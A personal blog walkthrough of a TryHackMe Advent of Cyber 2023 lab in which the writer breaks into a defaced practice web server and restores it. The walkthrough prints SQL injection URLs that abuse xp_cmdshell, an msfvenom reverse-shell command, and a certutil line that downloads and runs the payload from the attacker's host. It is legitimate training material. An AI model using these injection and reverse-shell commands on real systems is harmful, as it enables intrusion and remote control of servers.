Room: Advent of Cyber 2023 Day 10

Hacking back into your own server. 😂🤷‍♂️

Hacking is mostly seen as something negative, through the eyes of most people in the world. I like the idea of a red team hacking back into their own servers and closing the door behindthem. Fighting back the attacker with their own weapons.

Also I figured out how to make a reverse shell with a virtual box on my personal PC for the first time. Doing it through the attack box always worked like a charm, but I could never figure out how to do it with my own virtual box. So after the challenge I’ll go into what went wrong there in the past.

Another thing I bumped into was Apple copy/pasting ‘ into ’, which results in invalid SQL. I have now idea what that is all about.

I really like the effort they put in the defacing of the website 😂

Clicking this link will take you to the URL, which is the answer to Task 1

To see what kind of payload is sent to PHP, fill in something random and press search.

Tampering with the SQL payload displayed in the url will return an error message on the screen. You can fill in anything you want, as long as it is not valid SQL 🙃

http://10.10.149.18/giftresults.php?age=' OR 1=1 — 

This SQL injection query will dump the whole table of the database on the screen. The flag is the last entry.

To achieve this we need to be able to look around in the system that is hosting the website. Meaning we need a reverse shell, the meat and potato of this challenge.

Step 1: Enable XP_cmdshell with a SQL injection

http://MACHINE_IP/giftresults.php?age='; EXEC xp_cmdshell ‘C:\Windows\Temp\reverse.exe’; — 

Step 2: Set up an HTTP server and netcat listener

Open 2 terminals and activate the services that are needed.

Step 3: Create the reverse shell payload with msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR.IP.ADDRESS.HERE LPORT=4444 -f exe -o reverse.exe

This will create “reverse.exe”, an executable that creates a reverse shell.

Step 4: Copy the reverse.exe file to target machine (BFC website) with SQL injection

http://MACHINE_IP/giftresults.php?age='; EXEC xp_cmdshell ‘certutil -urlcache -f http://YOUR.IP.ADDRESS.HERE:8000/reverse.exe C:\Windows\Temp\reverse.exe’; — 

Step 5: Execute the reverse.exe file by using SQL injection.

http://MACHINE_IP/giftresults.php?age='; EXEC xp_cmdshell ‘C:\Windows\Temp\reverse.exe’;

At this point you should be in!

Notice the HTTP server got a few get requests, this was you copying the files.

And the NetcatListener picked up the reverse shell, now displaying a windows terminal, that of the website’s machine!

When looking around in the machine, we can find a note.txt file in the desktop folder. Which is the folder where everyone stores their temporary stuff, to then never delete it. 😅

In the note.txt file we can find the answer for Task 4.

In the note.txt file we can find much more than just the answer to Task 4.

It seems like the attacker built a bash script that allows you to restore the website to before it was defaced!

Executing restore_website.bat will restore the website to it’s original content.

Checking out the restored website, we find the answer to Task 5.

I really like the command TryhackMe provided to find the correct URL of the attackbox, so we could create the reverse shell payload and copy it from our machine to the machine of the website

ifconfig ens5 | grep -oP ‘inet \K[\d.]+’

However my machine did not have a “ens5” interface? I could not find the IP I should be using.

When asking a colleague about this, he made the point that a virtual box creates it’s own network. Completly seperating it from your physical machine. If you are logged in to the THM VPN, it does not matter, the 2 machines have seperated networks.

The solution to this is quite simple, just connect to the THM OpenVPN server on your Kali Linux machine. This will add a “tun0” network interface. As displayed in the picture below.

From there I could do the same thing as I did in the attackbox, spin up the terminals and run the services needed for the reverse shell.

In the future I might write something that is more in depth, how VPN’s and networks work, which interfaces they use and how they all talk to eachother. Or how they don’t! If you’re intrested in that, let me know!

Happy Hacking!